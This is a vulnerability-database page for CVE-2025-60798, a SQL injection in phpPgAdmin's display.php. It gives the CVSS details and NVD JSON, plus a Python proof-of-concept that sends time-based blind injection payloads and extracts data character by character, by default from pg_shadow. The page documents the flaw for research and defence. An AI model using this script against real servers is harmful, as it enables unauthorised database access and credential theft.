Security Vulnerability Report
中文
CVE-2025-60798 CVSS 6.5 MEDIUM

CVE-2025-60798

Published: 2025-11-20 15:17:38
Last Modified: 2025-11-25 19:11:51
Source: [email protected]

Description

phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in display.php at line 396. The application passes user-controlled input from $_REQUEST['query'] directly to the browseQuery function without proper sanitization. An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands through malicious query manipulation, potentially leading to complete database compromise.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:* - VULNERABLE
phpPgAdmin <= 7.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-60798 SQL Injection PoC for phpPgAdmin 7.13.0 # Target: phpPgAdmin display.php def exploit_sql_injection(target_url, session_cookie, table_name="pg_shadow"): """ Exploits SQL injection in display.php via $_REQUEST['query'] parameter This PoC demonstrates blind SQL injection to extract data """ # Vulnerable endpoint vuln_url = f"{target_url}/display.php" # Malicious SQL injection payload # Uses time-based blind SQL injection technique payload = f"'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM {table_name}--" headers = { 'Cookie': f'phpPgAdmin_Session={session_cookie}', 'Content-Type': 'application/x-www-form-urlencoded' } params = { 'query': payload, 'server': '1', 'database': 'postgres', 'schema': 'public', 'table': 'users' } print(f"[*] Target: {vuln_url}") print(f"[*] Payload: {payload}") print(f"[*] Sending malicious request...") try: response = requests.get(vuln_url, params=params, headers=headers, timeout=30) print(f"[+] Response status: {response.status_code}") if response.elapsed.total_seconds() > 4: print("[+] SQL injection confirmed! Time-based blind injection successful.") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def extract_data_blind(target_url, session_cookie, sql_query): """ Extract data using time-based blind SQL injection """ extracted_data = "" charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-' for pos in range(1, 50): found = False for char in charset: # Time-based blind SQL injection payload = f"'; SELECT CASE WHEN (SELECT SUBSTRING({sql_query},{pos},1)='{char}') THEN pg_sleep(3) ELSE pg_sleep(0) END--" params = { 'query': payload, 'server': '1', 'database': 'postgres' } headers = {'Cookie': f'phpPgAdmin_Session={session_cookie}'} try: response = requests.get(f"{target_url}/display.php", params=params, headers=headers, timeout=10) if response.elapsed.total_seconds() > 2: extracted_data += char print(f"[+] Extracted so far: {extracted_data}") found = True break except: continue if not found and extracted_data: break return extracted_data if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>") print(f"Example: python {sys.argv[0]} http://localhost/phppgadmin abc123def456") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] print("=" * 60) print("CVE-2025-60798 SQL Injection PoC") print("phpPgAdmin 7.13.0 and earlier") print("=" * 60) exploit_sql_injection(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60798", "sourceIdentifier": "[email protected]", "published": "2025-11-20T15:17:38.393", "lastModified": "2025-11-25T19:11:51.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpPgAdmin 7.13.0 and earlier contains a SQL injection vulnerability in display.php at line 396. The application passes user-controlled input from $_REQUEST['query'] directly to the browseQuery function without proper sanitization. An authenticated attacker can exploit this vulnerability to execute arbitrary SQL commands through malicious query manipulation, potentially leading to complete database compromise."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phppgadmin_project:phppgadmin:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.13.0", "matchCriteriaId": "AC3CB38F-12CA-4FA6-98DB-FFCC98F26715"}]}]}], "references": [{"url": "https://github.com/phppgadmin/phppgadmin/blob/master/display.php#L396", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60797.md", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60798.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.